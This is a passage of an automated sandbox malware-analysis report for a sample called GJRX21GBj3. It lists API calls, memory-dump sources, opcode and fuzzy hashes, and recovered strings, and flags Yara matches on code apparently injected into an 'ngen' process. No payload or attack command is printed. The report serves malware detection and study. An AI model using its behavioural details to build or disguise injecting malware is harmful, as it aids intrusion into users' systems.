                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF658563CD7,?,?,?,?,00007FF65855CCE5), ref: 00007FF65855D866
                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF658563CD7,?,?,?,?,00007FF65855CCE5), ref: 00007FF65855D88A
                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF658563CD7,?,?,?,?,00007FF65855CCE5), ref: 00007FF65855D8AE
                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF658563CD7,?,?,?,?,00007FF65855CCE5), ref: 00007FF65855D8D2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                 • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: strcmp
                                                • String ID: GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent
                                                • API String ID: 1004003707-945519297
                                                • Opcode ID: 197e38a6a36c6bb4220fbaead1b9f78f8d00f9fc7e04546cb49c79d4988069bc
                                                • Instruction ID: d2e3f6ad8a678db2b5bd4514f28e940a3d9fd115224802f468766190b0ab904c
                                                • Opcode Fuzzy Hash: 197e38a6a36c6bb4220fbaead1b9f78f8d00f9fc7e04546cb49c79d4988069bc
                                                • Instruction Fuzzy Hash: 33412C25E08B4240FA94A739A95027912A2AF517F4F4C0371D87DB7ED9EF2CE946D708
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
                                                • String ID: InitializeContext2$kernel32.dll
                                                • API String ID: 4102459504-3117029998
                                                • Opcode ID: e6c972ee89a253928001caa749724e57dab32ad1c9570b43b651811b21d24b24
                                                • Instruction ID: 8e5ab6fbf97ef4a5d5ab72db9edf576f44e5e4a537f5cc3456ae1174dc8cd1cb
                                                • Opcode Fuzzy Hash: e6c972ee89a253928001caa749724e57dab32ad1c9570b43b651811b21d24b24
                                                • Instruction Fuzzy Hash: CE319E71A19B5682EB40DB71A440279A390FF84BA0F4C0435DD5DA7FA4EF7CE886D708
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
                                                • String ID:
                                                • API String ID: 510365852-3916222277
                                                • Opcode ID: 1332bfa6df53277a3ccedc8723911591ab112e322b4924b62ab04042915ed568
                                                • Instruction ID: c6487d54c79b9bb21bf95a89299591d64dba43c674495b7dbfd4679c55d92d29
                                                • Opcode Fuzzy Hash: 1332bfa6df53277a3ccedc8723911591ab112e322b4924b62ab04042915ed568
                                                • Instruction Fuzzy Hash: 53119F72A08B818ADBA0EF65F4401DAB350FB457B4F180334E6BE5BAD6CF38D5428B44
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave
                                                • String ID:
                                                • API String ID: 3168844106-0
                                                • Opcode ID: f53b0cf296a2f0a884e1fd4cc14872174b3daa9af663874dfa4f6200fc7a1855
                                                • Instruction ID: e8db1053603b4b3d2e99d73021f1ccdfbdfe4ae9911114fe4d79504ced1d6e8a
                                                • Opcode Fuzzy Hash: f53b0cf296a2f0a884e1fd4cc14872174b3daa9af663874dfa4f6200fc7a1855
                                                • Instruction Fuzzy Hash: 9A615A21A59B8684EA908F31EC802B963A5FF85790F5D1132D99EB3F65DF3CE045CB48
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave
                                                • String ID:
                                                • API String ID: 3168844106-0
                                                • Opcode ID: cc348131d89d10fcdaa60efc61662731d4453f357470223f95077c9bab94ee90
                                                • Instruction ID: 1012eb27a286ce62a13e363ff98f88b84067c847e3d6a1f682c3c7176197a51f
                                                • Opcode Fuzzy Hash: cc348131d89d10fcdaa60efc61662731d4453f357470223f95077c9bab94ee90
                                                • Instruction Fuzzy Hash: 06514B25A58B8681EAA09F31EC403B977A4FF85790F9D0136C99EA3F55DF3CE0458B08
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: ExceptionFailFastRaise
                                                • String ID: Process is terminating due to StackOverflowException.
                                                • API String ID: 2546344036-2200901744
                                                • Opcode ID: 9d7b98e1c26a9380dc8d41e070e364fbb808deaa013c945634dfd4d3c0b2d453
                                                • Instruction ID: 041bb661a79e9d34b8fe19a9df9233c002c62584542dd56d7556a635f07d5d18
                                                • Opcode Fuzzy Hash: 9d7b98e1c26a9380dc8d41e070e364fbb808deaa013c945634dfd4d3c0b2d453
                                                • Instruction Fuzzy Hash: 52518421B09B4291EE949B29E4903F96790EF59B90F4C4035DB1EE7FA1DF2CE495C308
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: SwitchThread
                                                • String ID:
                                                • API String ID: 115865932-0
                                                • Opcode ID: d00efbbb26263cc08ad4df3913b4dcfaa6276e0511a9266e1d0ba80b3ed15afd
                                                • Instruction ID: 49fbee48494c3bab371b714319d51774476b68ea79d93b2d319b35b41dfea992
                                                • Opcode Fuzzy Hash: d00efbbb26263cc08ad4df3913b4dcfaa6276e0511a9266e1d0ba80b3ed15afd
                                                • Instruction Fuzzy Hash: 724181B2B8965686EBE09E35D0406397290EB40BD4F5C8139DA0FD6EC9DE3CE840CB48
                                                APIs
                                                • WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF658553141), ref: 00007FF65855C914
                                                • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF658553141), ref: 00007FF65855C91E
                                                • CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF658553141), ref: 00007FF65855C93D
                                                • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF658553141), ref: 00007FF65855C951
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: ErrorLastMultipleWait$HandlesObjects
                                                • String ID:
                                                • API String ID: 2817213684-0
                                                • Opcode ID: 3f11a659937ca2a9d2f58ed7fb8769b284d6cf253c5c6821f0f42326241e4d41
                                                • Instruction ID: fc6acf97986f076122591508defecf5fe0335b6bbed27705363a65cc906b6808
                                                • Opcode Fuzzy Hash: 3f11a659937ca2a9d2f58ed7fb8769b284d6cf253c5c6821f0f42326241e4d41
                                                • Instruction Fuzzy Hash: CA112E31B08B56C2E7648B36B44152AB275FB44B90F184139EADDA7FD9CF3CE8408B48
                                                APIs
                                                • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6585B19E3), ref: 00007FF6585B2720
                                                • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6585B19E3), ref: 00007FF6585B2761
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 0ffc842e3cd9d8863173c70d516709e896315b3aa4b438e39af49301c1c78a26
                                                • Instruction ID: c23414b2b0c879661698d84f29695e9209bc2e29b358819cecdd19215e2e2074
                                                • Opcode Fuzzy Hash: 0ffc842e3cd9d8863173c70d516709e896315b3aa4b438e39af49301c1c78a26
                                                • Instruction Fuzzy Hash: D4115B32618B8082EB618F25E40026A77E1FB88B84F584235DF8D57B58EF3CC555CB08
                                                APIs
                                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,HeapVerify,00007FF65855D913,?,?,?,00007FF658563CD7,?,?,?,?,00007FF65855CCE5), ref: 00007FF65855E0EB
                                                • strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,HeapVerify,00007FF65855D913,?,?,?,00007FF658563CD7,?,?,?,?,00007FF65855CCE5), ref: 00007FF65855E128
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: _stricmpstrtoull
                                                • String ID: HeapVerify
                                                • API String ID: 4031153986-2674988305
                                                • Opcode ID: 76587d0a3d7f317c46cd9241e9b139c3ad74e0b9b9e742cb6b28ded029d14747
                                                • Instruction ID: dd03101b5863a0369aeb1147824f60ac2b7e5871a365d4a4758de22063a3f59b
                                                • Opcode Fuzzy Hash: 76587d0a3d7f317c46cd9241e9b139c3ad74e0b9b9e742cb6b28ded029d14747
                                                • Instruction Fuzzy Hash: B3017571A09A42CAEB909F36E9800797365FB447C0F5C9135EA9D93F59DF3CE541C608
                                                APIs
                                                • EnterCriticalSection.KERNEL32(?,?,00000080,00007FF6585757BF,?,?,?,00007FF658582F8B), ref: 00007FF65857568D
                                                • LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF6585757BF,?,?,?,00007FF658582F8B), ref: 00007FF6585756E2
                                                • EnterCriticalSection.KERNEL32(?,?,00000080,00007FF6585757BF,?,?,?,00007FF658582F8B), ref: 00007FF6585756FF
                                                • LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF6585757BF,?,?,?,00007FF658582F8B), ref: 00007FF65857571C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave
                                                • String ID:
                                                • API String ID: 3168844106-0
                                                • Opcode ID: dc4647aee6fef599a95d088791b2164ab4126b57bf50acce3f02ed7a20a5dc51
                                                • Instruction ID: 5d4a69c93188db7e9c0c924e47da04c12efb82b70911e01e1f8b178a6572b53b
                                                • Opcode Fuzzy Hash: dc4647aee6fef599a95d088791b2164ab4126b57bf50acce3f02ed7a20a5dc51
                                                • Instruction Fuzzy Hash: F621B221A58A4682EA508F31FC502B923A5EF05BE0F8D5235D96EA3F95CF2CE149C348

                                                Execution Graph

                                                Execution Coverage:1.4%
                                                Dynamic/Decrypted Code Coverage:4.9%
                                                Signature Coverage:9.2%
                                                Total number of Nodes:142
                                                Total number of Limit Nodes:10

                                                Control-flow Graph (legend: Executed / Not Executed; rendered graph, edge data omitted): basic blocks 417a33-417aad; calls to 42e163, 42e683, 42e923, 42cb23 and LdrLoadDll (block 417a93-417aa7).
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AA5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ngen.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                                                • Instruction ID: a14b4ffdb5fe0ebae34abb196159bdaefeaa327230b00d9eb3ec642f8eb76095
                                                • Opcode Fuzzy Hash: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                                                • Instruction Fuzzy Hash: 940112B5E4010DBBDF10DAA5DC42FDEB7789F54304F004196E90897241F635EB548755

                                                Control-flow Graph (legend: Executed / Not Executed; rendered graph, edge data omitted): basic block 42b593-42b5cf; calls to 4049a3, 42c643 and NtClose.
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ngen.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 74d62e7fed49fee6b13ec8ce7c6b43655ce95c97f7f228006ed85af9b9889e1d
                                                • Instruction ID: 1573654a4f4f23356e70bd42089c4cb39e63ab89980323d43f3de8af3be88636
                                                • Opcode Fuzzy Hash: 74d62e7fed49fee6b13ec8ce7c6b43655ce95c97f7f228006ed85af9b9889e1d
                                                • Instruction Fuzzy Hash: 6BE04676204254BBC220AA6AEC41F9F776DDFC5724F00442AFA08A7282C6B5BA1186E5
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: cb4b9bbe71f0b8a24b18c3cd3b8d8d825946d15d6df3d4bd8fa0cbc0984bd3ba
                                                • Instruction ID: 662e5180e74ef6da28ae27ee08d1d957d2fb5cd61008ec2f4ba2ef037962122a
                                                • Opcode Fuzzy Hash: cb4b9bbe71f0b8a24b18c3cd3b8d8d825946d15d6df3d4bd8fa0cbc0984bd3ba
                                                • Instruction Fuzzy Hash: B490023670551406D10071584554706516587D0201FA5C411A5428568D87998E5569B3
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f30365e1e9bc35a4e24ae96e359d7b203a8886acfd69e06a16fb025f22b4b847
                                                • Instruction ID: db67e4128848989b241cdd49e8626ff94f0a8f68c45f640e459e4881cf6d8c6d
                                                • Opcode Fuzzy Hash: f30365e1e9bc35a4e24ae96e359d7b203a8886acfd69e06a16fb025f22b4b847
                                                • Instruction Fuzzy Hash: 1090023630141417D11171584544707416987D0241FD5C412A5428558D965A8E56A532
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 72a99df36c718de746cf337525b294f2a222b5717937111247e765065ab064ad
                                                • Instruction ID: 867e83a4f03ce1b7ba96ec95729a0441a3c7bc64c796b462ba01e72b6fb55bc4
                                                • Opcode Fuzzy Hash: 72a99df36c718de746cf337525b294f2a222b5717937111247e765065ab064ad
                                                • Instruction Fuzzy Hash: 0490023630149806D1107158844474A416587D0301F99C411A9428658D86998D957532
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d63f95620425f02c5e6df26f568058e082e53ba61a51900bcc1071fb964e0f1c
                                                • Instruction ID: 73446c4c489d1277433f20241f6609e687b9107f13c1daa7ce8fd375b9d7429c
                                                • Opcode Fuzzy Hash: d63f95620425f02c5e6df26f568058e082e53ba61a51900bcc1071fb964e0f1c
                                                • Instruction Fuzzy Hash: B090026630241007410571584454616816A87E0201B95C021E6018590DC5298D956536

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 00414107
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ngen.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: H0840I45$H0840I45
                                                • API String ID: 1836367815-3713557624
                                                • Opcode ID: 9c137fe075127a70db5381a908e253cb779df88f74039d614837a5d3f9b81308
                                                • Instruction ID: e9a8c8687aaeafff36046211043bea6d8f886e60d9afbd7522c3a782f38ba3bd
                                                • Opcode Fuzzy Hash: 9c137fe075127a70db5381a908e253cb779df88f74039d614837a5d3f9b81308
                                                • Instruction Fuzzy Hash: A1118973904158BBDB029B749C46DEFFF7CEF81350B0480AEFA5467142D6394E4287A5

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 00414107
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ngen.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: H0840I45$H0840I45
                                                • API String ID: 1836367815-3713557624
                                                • Opcode ID: 34911ca6fa78662a9a750860d5d86970cb422ce9c6129bf029718bd3649f74d8
                                                • Instruction ID: d6e4ff19b95466e9fe5a75fee5ad12c3f5ada0eb833e20bbb35db8e367bde451
                                                • Opcode Fuzzy Hash: 34911ca6fa78662a9a750860d5d86970cb422ce9c6129bf029718bd3649f74d8
                                                • Instruction Fuzzy Hash: 6E0166B2D0010C7ADB109FE19C82EEFAB7CDF84798F40802AFA04B7241D2784F4687A5

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 00414107
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ngen.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: H0840I45$H0840I45
                                                • API String ID: 1836367815-3713557624
                                                • Opcode ID: c91aaa8decee38f3a30e2a95e9d8b0a291183a2d72e685fc848b434c8b6d8a09
                                                • Instruction ID: cf9192664244b9ac975f5907ec0277faeb991ed911cf0314b90d64a2ad3432a1
                                                • Opcode Fuzzy Hash: c91aaa8decee38f3a30e2a95e9d8b0a291183a2d72e685fc848b434c8b6d8a09
                                                • Instruction Fuzzy Hash: 9011E5B2D0411C7EEB119FA19C82DEFBB7CDF417A8F008069FA04A7141D6794F0687A5

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 00414107
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ngen.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: H0840I45$H0840I45
                                                • API String ID: 1836367815-3713557624
                                                • Opcode ID: 5772162eecc2fe24cd4613575fecf9fb22c6b493dc5cb581e736842785e4031c
                                                • Instruction ID: 3a752632b7030014dc9c9c30b5bcc15c88147ef53de421226a9d1532deb992d1
                                                • Opcode Fuzzy Hash: 5772162eecc2fe24cd4613575fecf9fb22c6b493dc5cb581e736842785e4031c
                                                • Instruction Fuzzy Hash: D901C4B2D0021C7AEB11AFE19C82DEFBB7CDF41798F408069FA14A7241D6794F0647A5

                                                Control-flow Graph (legend: Executed / Not Executed; rendered graph, edge data omitted): basic block 42b903-42b947; calls to 4049a3, 42c643 and RtlFreeHeap.
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B942
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ngen.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: gA
                                                • API String ID: 3298025750-3478526202
                                                • Opcode ID: e7214976f619b748219cd2fa71ca53e767825fd315e4bba5c138d2cf3527078b
                                                • Instruction ID: fe3716f387f97a3cfac574e56e7d4e73213d1ab919c33c628ae6fa0e6f0a2ede
                                                • Opcode Fuzzy Hash: e7214976f619b748219cd2fa71ca53e767825fd315e4bba5c138d2cf3527078b
                                                • Instruction Fuzzy Hash: A9E06DB12043047BC620EE59EC45F9B73ACEFC5714F000029FA08A7241C671BA108AF9

                                                Control-flow Graph (legend: Executed / Not Executed; rendered graph, edge data omitted): basic blocks in the range 417a64-417b91 (entry 417ab3); calls to 42e683, 42e923, 42cb23 and LdrLoadDll (block 417a93-417aa7).
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AA5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ngen.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 06c304be024d8702e79fa6f4f19215bbb79918f4870c72a52a1b29490fcb6eb2
                                                • Instruction ID: 6c43b7506f89a022c64d044e6c1ccbca58ffe011e8d6516ae037575ea145fc98
                                                • Opcode Fuzzy Hash: 06c304be024d8702e79fa6f4f19215bbb79918f4870c72a52a1b29490fcb6eb2
                                                • Instruction Fuzzy Hash: 8C219D73A4810A6BDB01D998DC82ADEBB68EF41748F14415AE805DB343EB35EA06C7E5

                                                Control-flow Graph (legend: Executed / Not Executed; rendered graph, edge data omitted): basic block 42b8b3-42b8f7; calls to 4049a3, 42c643 and RtlAllocateHeap.
                                                APIs
                                                • RtlAllocateHeap.NTDLL(?,0041E238,?,?,00000000,?,0041E238,?,?,?), ref: 0042B8F2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ngen.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: e87ef4bac42e6c86340b279ddb217ac5fed7b9462247c58aa44df4a450922197
                                                • Instruction ID: d9b541be78cc90539b36e3aa14f4a365451e7fb9285a10e02975410261364557
                                                • Opcode Fuzzy Hash: e87ef4bac42e6c86340b279ddb217ac5fed7b9462247c58aa44df4a450922197
                                                • Instruction Fuzzy Hash: DAE06DB62042047FD620EF59EC45E9B73ACEFC9714F004419F908A7241D671B9108AB9

                                                Control-flow Graph (legend: Executed / Not Executed; rendered graph, edge data omitted): basic block 42b953-42b98f; calls to 4049a3, 42c643 and ExitProcess.
                                                APIs
                                                • ExitProcess.KERNEL32(?,00000000,?,?,0FADE886,?,?,0FADE886), ref: 0042B98A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ngen.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: 06b400fc049ae8453f422dbdba32e523414dcf3d7d78a6a6816b0409ae45605f
                                                • Instruction ID: c24f298f8ce9a33bcb8732fbd3dc6627db416b18a23357072eb898eabaee20fe
                                                • Opcode Fuzzy Hash: 06b400fc049ae8453f422dbdba32e523414dcf3d7d78a6a6816b0409ae45605f
                                                • Instruction Fuzzy Hash: 5BE04F756012147BD620AB5AEC41F9B775CDBC5714F40406AFA08A7145C6747A1187F5
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 35cd4e2740dc5fa1e9b7b1cb2cb5186cded2ebc32dc949148df334e76b4616da
                                                • Instruction ID: 48e7bb2212e0fce83b3dc7d7a253c086e42e857c9a45ce1a6d685fb021b1d4af
                                                • Opcode Fuzzy Hash: 35cd4e2740dc5fa1e9b7b1cb2cb5186cded2ebc32dc949148df334e76b4616da
                                                • Instruction Fuzzy Hash: E4B02B329014C0C9DA00F3204608B177E1077C0300F15C061D3034241E033CC4C0E172
                                                Strings
                                                • Critical section address., xrefs: 058F5502
                                                • undeleted critical section in freed memory, xrefs: 058F542B
                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 058F54CE
                                                • Thread identifier, xrefs: 058F553A
                                                • Thread is in a state in which it cannot own a critical section, xrefs: 058F5543
                                                • Invalid debug info address of this critical section, xrefs: 058F54B6
                                                • corrupted critical section, xrefs: 058F54C2
                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 058F540A, 058F5496, 058F5519
                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 058F54E2
                                                • 8, xrefs: 058F52E3
                                                • double initialized or corrupted critical section, xrefs: 058F5508
                                                • Critical section address, xrefs: 058F5425, 058F54BC, 058F5534
                                                • Address of the debug info found in the active list., xrefs: 058F54AE, 058F54FA
                                                • Critical section debug info address, xrefs: 058F541F, 058F552E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
